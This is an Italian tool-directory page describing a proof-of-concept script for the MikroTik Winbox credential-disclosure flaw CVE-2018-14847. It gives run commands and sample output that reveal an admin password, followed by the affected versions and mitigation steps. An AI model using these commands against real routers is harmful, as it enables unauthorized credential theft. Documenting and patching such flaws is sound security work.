Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Python-MikrotikLoginExploit — PoC della vulnerabilità CVE-2018-14847 di Mikrotik usando uno script semplice | Kitploit
Strumenti/GitHubGitHub/sinichi449/python-mikrotikloginexploit
RicognizioneAttacchi alle PasswordAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza di Rete
GitHubsinichi449/python-mikrotikloginexploit

Python-MikrotikLoginExploit

PoC della vulnerabilità CVE-2018-14847 di Mikrotik usando uno script semplice

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
2126 anni faRevisionato da Kitploit

Mikrotik Login Exploit

PoC (Proof of Concept) della vulnerabilità mikrotik CVE-2018-14847 (soprattutto su winbox), funziona leggendo la password direttamente da RouterOS sulla porta predefinita 8291.

Originale di: https://github.com/BigNerd95/

Requisiti

  • Python 3+

Installazione su Linux

root@kitploit:~
apt install python3

Esempio di Utilizzo

WinBox (TCP/IP)

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

es.:

root@kitploit:~
$ python3 WinboxExploit.py 192.168.1.1
Connected to 192.168.1.1:8291
Exploit successful
User: admin
Pass: oppaidaisuki123

Utilizzo tramite Indirizzo MAC

Puoi usare questo script anche senza indirizzo IP.

Usa MACServerDiscovery.py per scansionare il router.

root@kitploit:~
python3 MACServerDiscover.py

es.:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Exploit:

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

es.:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: oppaidaisuki123

Versioni Vulnerabili

RouterOS dal 2015-05-28 al 2018-04-20

Versioni RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

Maggiori informazioni : https://blog.mikrotik.com/security/winbox-vulnerability.html

Prevenzione dell'Exploit

  • Aggiorna RouterOS alla 6.42+
  • Disabilita Winbox
  • Blocca il servizio:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Regole di filtro (ACL), blocca la porta 8291:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • Limita l'accesso di login winbox tramite indirizzo MAC:
root@kitploit:~
/tool mac-server mac-winbox
Scarica lo strumento